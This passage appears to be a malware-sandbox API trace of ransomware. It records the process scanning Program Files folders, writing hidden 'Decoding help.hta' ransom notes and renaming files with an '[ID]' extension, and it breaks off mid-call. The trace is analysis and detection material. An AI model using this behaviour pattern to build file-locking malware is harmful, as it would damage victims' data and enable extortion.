lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Clock.Gadget", cAlternateFileName="CLOCK~1.GAD")) returned 1 [0041.362] lstrcmpW (lpString1=".", lpString2="Clock.Gadget") returned -1 [0041.362] lstrcmpW (lpString1="..", lpString2="Clock.Gadget") returned -1 [0041.362] lstrcmpiW (lpString1="windows", lpString2="Clock.Gadget") returned 1 [0041.362] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" [0041.362] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned 54 [0041.362] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\", lpString2="Clock.Gadget" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget" [0041.362] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0041.362] GlobalMemoryStatus (in: lpBuffer=0xa00fd10 | out: lpBuffer=0xa00fd10) [0041.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3380118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.363] CloseHandle (hObject=0x2f0) returned 1 [0041.363] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CPU.Gadget", cAlternateFileName="CPU~1.GAD")) returned 1 [0041.363] lstrcmpW (lpString1=".", lpString2="CPU.Gadget") returned -1 [0041.363] lstrcmpW (lpString1="..", lpString2="CPU.Gadget") returned -1 [0041.363] lstrcmpiW (lpString1="windows", lpString2="CPU.Gadget") returned 1 [0041.363] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" [0041.363] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned 54 [0041.363] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\", lpString2="CPU.Gadget" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget" [0041.363] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0041.363] GlobalMemoryStatus (in: lpBuffer=0xa00fd10 | out: lpBuffer=0xa00fd10) [0041.364] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93a02b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.364] CloseHandle (hObject=0x2f0) returned 1 [0041.364] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Currency.Gadget", cAlternateFileName="CURREN~1.GAD")) returned 1 [0041.364] lstrcmpW (lpString1=".", lpString2="Currency.Gadget") returned -1 [0041.364] lstrcmpW (lpString1="..", lpString2="Currency.Gadget") returned -1 [0041.364] lstrcmpiW (lpString1="windows", lpString2="Currency.Gadget") returned 1 [0041.364] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" [0041.364] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned 54 [0041.364] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\", lpString2="Currency.Gadget" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget" [0041.364] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0041.364] GlobalMemoryStatus (in: lpBuffer=0xa00fd10 | out: lpBuffer=0xa00fd10) [0041.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9358180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.365] CloseHandle (hObject=0x2f0) returned 1 [0041.365] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PicturePuzzle.Gadget", cAlternateFileName="PICTUR~1.GAD")) returned 1 [0041.365] lstrcmpW (lpString1=".", lpString2="PicturePuzzle.Gadget") returned -1 [0041.365] lstrcmpW (lpString1="..", lpString2="PicturePuzzle.Gadget") returned -1 [0041.366] lstrcmpiW (lpString1="windows", lpString2="PicturePuzzle.Gadget") returned 1 [0041.366] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" [0041.366] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned 54 [0041.366] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\", lpString2="PicturePuzzle.Gadget" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget" [0041.366] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0041.366] GlobalMemoryStatus (in: lpBuffer=0xa00fd10 | out: lpBuffer=0xa00fd10) [0041.366] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ee8db0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.367] CloseHandle (hObject=0x2f0) returned 1 [0041.367] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSSFeeds.Gadget", cAlternateFileName="RSSFEE~1.GAD")) returned 1 [0041.367] lstrcmpW (lpString1=".", lpString2="RSSFeeds.Gadget") returned -1 [0041.367] lstrcmpW (lpString1="..", lpString2="RSSFeeds.Gadget") returned -1 [0041.367] lstrcmpiW (lpString1="windows", lpString2="RSSFeeds.Gadget") returned 1 [0041.367] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" [0041.367] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned 54 [0041.367] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\", lpString2="RSSFeeds.Gadget" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget" [0041.367] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0041.367] GlobalMemoryStatus (in: lpBuffer=0xa00fd10 | out: lpBuffer=0xa00fd10) [0041.367] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cf0528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.368] CloseHandle (hObject=0x2f0) returned 1 [0041.368] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SlideShow.Gadget", cAlternateFileName="SLIDES~1.GAD")) returned 1 [0041.368] lstrcmpW (lpString1=".", lpString2="SlideShow.Gadget") returned -1 [0041.368] lstrcmpW (lpString1="..", lpString2="SlideShow.Gadget") returned -1 [0041.368] lstrcmpiW (lpString1="windows", lpString2="SlideShow.Gadget") returned 1 [0041.368] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" [0041.368] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned 54 [0041.368] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\", lpString2="SlideShow.Gadget" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget" [0041.368] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0041.368] GlobalMemoryStatus (in: lpBuffer=0xa00fd10 | out: lpBuffer=0xa00fd10) [0041.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33b01e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.369] CloseHandle (hObject=0x2f0) returned 1 [0041.369] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 1 [0041.369] lstrcmpW (lpString1=".", lpString2="Weather.Gadget") returned -1 [0041.369] lstrcmpW (lpString1="..", lpString2="Weather.Gadget") returned -1 [0041.369] lstrcmpiW (lpString1="windows", lpString2="Weather.Gadget") returned 1 [0041.369] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" [0041.369] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned 54 [0041.369] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\", lpString2="Weather.Gadget" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget" [0041.370] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0041.370] GlobalMemoryStatus (in: lpBuffer=0xa00fd10 | out: lpBuffer=0xa00fd10) [0041.370] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d205f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.370] CloseHandle (hObject=0x2f0) returned 1 [0041.370] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 0 [0041.370] FindClose (in: hFindFile=0x5d8450 | out: hFindFile=0x5d8450) returned 1 Thread: id = 274 os_tid = 0x9c8 [0040.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*", lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21ca67c6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d82d0 [0040.893] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.893] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21ca67c6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.327] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.327] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.328] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mpvis.dll.mui", cAlternateFileName="")) returned 1 [0041.328] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.328] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.328] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" [0041.328] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\decoding help.hta")) returned 0xffffffff [0041.328] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0041.336] WriteFile (in: hFile=0x358, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa3cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa3cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.336] CloseHandle (hObject=0x358) returned 1 [0041.337] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.337] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mpvis.dll.mui") returned -1 [0041.337] lstrlenW (lpString="mpvis.dll.mui") returned 13 [0041.337] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.337] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.337] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="mpvis.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui" [0041.337] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui" [0041.337] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\mpvis.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\mpvis.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.352] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xdc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup_wm.exe.mui", cAlternateFileName="")) returned 1 [0041.352] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.352] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.352] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" [0041.352] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0041.352] lstrcmpiW (lpString1="Decoding help.hta", lpString2="setup_wm.exe.mui") returned -1 [0041.352] lstrlenW (lpString="setup_wm.exe.mui") returned 16 [0041.352] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.352] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.352] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="setup_wm.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui" [0041.353] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui" [0041.353] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\setup_wm.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\setup_wm.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.353] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmlaunch.exe.mui", cAlternateFileName="")) returned 1 [0041.353] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.353] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.353] lstrcatW (in: 